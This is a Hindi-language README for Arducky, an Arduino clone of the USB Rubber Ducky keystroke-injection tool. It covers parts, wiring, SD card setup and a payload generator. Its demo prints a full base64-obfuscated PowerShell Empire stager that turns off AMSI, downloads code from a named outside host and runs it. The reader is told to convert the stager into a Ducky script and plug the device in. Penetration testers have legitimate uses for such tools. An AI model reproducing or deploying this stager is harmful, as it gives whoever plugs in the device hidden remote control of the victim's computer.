
Arducky - Arduino Ducky Script Interpreter
यह परियोजना Hak5 के USB Rubber Ducky का एक सस्ता (लेकिन कम प्रभावी नहीं) विकल्प बनाने का लक्ष्य रखती है।
USB Rubber Ducky एक HID (ह्यूमन इंटरफ़ेस डिवाइस) है जिसे एक सरल स्क्रिप्टिंग भाषा के साथ प्रोग्राम किया जा सकता है, जो पैठ परीक्षकों को मानव कीबोर्ड इनपुट की नकल करने वाले सुरक्षा ऑडिटिंग पेलोड को जल्दी और आसानी से तैयार करने और तैनात करने की अनुमति देता है।
Arducky का उपयोग करके, आपको केवल MicroSD कार्ड पर संग्रहीत Ducky Script से निपटना होता है।
सेटअप के बाद, आपको स्क्रिप्ट बदलने के लिए अपने Arduino को फिर से प्रोग्राम करने की आवश्यकता नहीं होगी।
| मात्रा | वस्तु | मूल्य | विवरण |
|---|---|---|---|
| 1 | Arduino Pro Micro ATmega32U4 5V Board | $4.11 | USB प्रोटोकॉल के साथ संगत, HID माउस या कीबोर्ड के रूप में उपयोग किया जा सकता है |
| 1 | Micro SD Memory Shield | $0.78 | |
| 1 | Micro USB OTG Adapter | $0.99 | वैकल्पिक। माइक्रो USB केबल को बदलने के लिए उपयोग किया जा सकता है |
| 1 | DuPont Wires | $1.28 | |
| 1 | Micro SD Card | $18.00 | यह एक उदाहरण है, संदेह है कि आपको 1GB से अधिक की आवश्यकता होगी |
Arducky के साथ अपने Micro SD कार्ड का उपयोग करने के लिए, कार्ड FAT32 फ़ाइल सिस्टम में फ़ॉर्मेट किया जाना चाहिए।
मैं दृढ़ता से अनुशंसा करता हूं कि आप अपने SD कार्ड को (भले ही वह नया हो!) आधिकारिक SDA (SD एसोसिएशन) के SD Memory Card Formatter का उपयोग करके फ़ॉर्मेट करें, न कि आपके ऑपरेटिंग सिस्टम द्वारा प्रदान किए गए फ़ॉर्मेटिंग टूल्स का।
अब जब आपने अपना MicroSD कार्ड फ़ॉर्मेट कर लिया है, तो आइए MicroSD शील्ड को वायर अप करें!
MicroSD कंट्रोलर इंटरफ़ेस में कुल छह पिन (GND, VCC, MISO, MOSI, SCK, CS) हैं।
Arduino SPI दस्तावेज़ीकरण के आधार पर, नियंत्रण इंटरफ़ेस को निम्नानुसार जोड़ा जाना चाहिए (DuPont तारों का उपयोग करके):

नोट: जैसा कि हार्डवेयर अनुभाग में उल्लेख किया गया है, मॉड्यूल 5V µC के साथ इंटरैक्ट करने के लिए डिज़ाइन किया गया है, इसलिए आपको अपने Arduino पर 5V पिन की आवश्यकता होगी।


प्रोजेक्ट को क्लोन करें:
git clone https://gitlab.com/Creased/arducky
cd arducky/
यदि आप AZERTY कीबोर्ड का उपयोग कर रहे हैं, तो आपको अपनी Keyboard लाइब्रेरी (Keyboard.cpp और Keyboard.h) को शामिल लाइब्रेरी से बदलना होगा।
arducky.ino स्केच को Arduino IDE का उपयोग करके अपने Arduino बोर्ड पर अपलोड करें।
arducky_femto.ino फ़ाइल को Ducky Script पेलोड के साथ उत्पन्न करने के लिए, आप femto_generate_payload.py का उपयोग कर सकते हैं:
~# python3 femto_generate_payload.py -h
usage: femto_generate_payload.py [-h] [-i ino_file] [-o output_file]
payload_file
Generates payload in arducky_femto.ino from an input Rubber Ducky payload file
positional arguments:
payload_file input Rubber Ducky payload file
optional arguments:
-h, --help show this help message and exit
-i ino_file, --ino ino_file
input Arducky ino file
-o output_file, --out output_file
output Arducky ino file
उदाहरण:
~# python3 femto_generate_payload.py -i arducky_femto.ino -o femto.ino demo/script.txt
Empire एक पोस्ट-एक्सप्लॉइटेशन फ्रेमवर्क है जो powershell.exe की आवश्यकता के बिना PowerShell एजेंट चलाने की क्षमता को लागू करता है, साथ ही की लॉगर्स से लेकर Mimikatz तक तेजी से तैनात किए जाने वाले पोस्ट-एक्सप्लॉइटेशन मॉड्यूल प्रदान करता है।
इस डेमो में, हम एक दूरस्थ सर्वर (जैसे VPS) पर एक Docker नोड पर Empire तैनात करेंगे और उसमें शामिल होने के लिए Arducky का उपयोग करेंगे।
कृपया इस गाइड में वर्णित चरणों का पालन करें।
एक नया Empire सेट करके, आपको इस प्रकार का एक पेलोड मिलना चाहिए (देखें demo/ फ़ोल्डर):
powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQBzAFMARQBNAEIAbAB5AC4ARwBlAHQAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAVABGAEkAZQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAFUAZQAoACQAbgBVAEwAbAAsACQAVAByAHUAZQApAH0AOwBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBTAEUAcgB2AGkAYwBlAFAATwBJAG4AdABNAGEAbgBBAGcARQBSAF0AOgA6AEUAWABwAEUAYwBUADEAMAAwAEMAbwBOAHQAaQBOAFUARQA9ADAAOwAkAHcAYwA9AE4ARQB3AC0ATwBCAEoAZQBDAFQAIABTAFkAUwB0AEUATQAuAE4ARQB0AC4AVwBFAEIAQwBsAGkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABXAGMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAHIATwBYAFkAPQBbAFMAeQBTAHQARQBNAC4ATgBFAHQALgBXAGUAQgBSAGUAcQB1AEUAUwBUAF0AOgA6AEQAZQBGAEEAVQBMAHQAVwBlAEIAUABSAG8AWABZADsAJAB3AEMALgBQAHIAbwBYAHkALgBDAHIAZQBEAEUAbgBUAEkAYQBMAFMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4ARQBUAC4AQwByAEUARABFAE4AVABJAEEAbABDAGEAYwBIAEUAXQA6ADoARABFAGYAYQBVAEwAVABOAEUAVAB3AG8AcgBLAEMAcgBlAGQARQBuAHQASQBBAGwAcwA7ACQASwA9AFsAUwBZAHMAdABlAE0ALgBUAEUAWABUAC4ARQBOAEMATwBEAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcASwBBAE4AcwAjADgAJQBtAHAAWgBpAGQAUABTAEwAaABhAF0AZwBWAFsAWQAuAEcAPwBuAGsAfQBGAGMALwAzACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUATgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBDAC4ASABFAGEARABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AMgBtADAARQB6AEsALwBlAEEATQBTAE4AbQAxAEIAaABlAEYAUwBEAGYAZAB3AE0AaQBxAFEAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvAHYAcABzADIALgBiAG0AbwBpAG4AZQAuAGYAcgA6ADgAMAA4ADAAJwA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAGQAQQB0AGEAPQAkAFcAQwAuAEQATwBXAE4AbABvAEEAZABEAGEAdABhACgAJABzAGUAUgArACQAVAApADsAJABJAFYAPQAkAEQAYQB0AEEAWwAwAC4ALgAzAF0AOwAkAGQAYQBUAEEAPQAkAEQAQQB0AEEAWwA0AC4ALgAkAEQAQQB0AGEALgBMAEUATgBnAHQAaABdADsALQBKAG8ASQBOAFsAQwBIAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
इसे stager.txt नामक फ़ाइल में सहेजें और Ducky Script बनाने के लिए create_script.sh स्क्रिप्ट चलाएँ:
./create_script.sh
उत्पन्न script.txt को अपने MicroSD कार्ड के फ़ाइल सिस्टम रूट पर कॉपी करें और Arducky को चालू करें।
यहाँ हमले को प्रदर्शित करने वाला एक वीडियो है:
वोइला!
